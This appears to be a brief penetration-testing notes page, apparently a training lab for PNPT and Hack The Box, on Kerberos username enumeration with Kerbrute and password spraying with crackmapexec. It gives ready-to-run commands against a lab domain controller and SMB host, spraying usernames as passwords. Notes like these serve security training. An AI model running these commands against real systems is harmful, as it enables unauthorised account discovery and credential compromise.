Kerbrute

Overview

Bruteforcing domain usernames is possible with Kerbrute. This is valuable from an information gathering perspective and can lead to some quick wins.

After finding some usernames you can password spray those accounts using their usernames as passwords. This is very common in the real world.

GitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcingGitHub

Kerbrute Attack

Enumerate for users

kerbrute userenum -d PNPT.LOCAL users.txt --dc DC.PNPT.LOCAL

/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

Password spray using --no-brute to avoid account lockout

crackmapexec smb 192.168.1.129 -u users.txt -p users.txt --no-brute -d manager.htb

PreviousIPv6 Attacks NextAS-REP Roasting

Last updated 1 year ago

hashtagOverview

hashtagKerbrute Attack

hashtagEnumerate for users

hashtagPassword spray using --no-brute to avoid account lockout

Overview

Kerbrute Attack

Enumerate for users

Password spray using --no-brute to avoid account lockout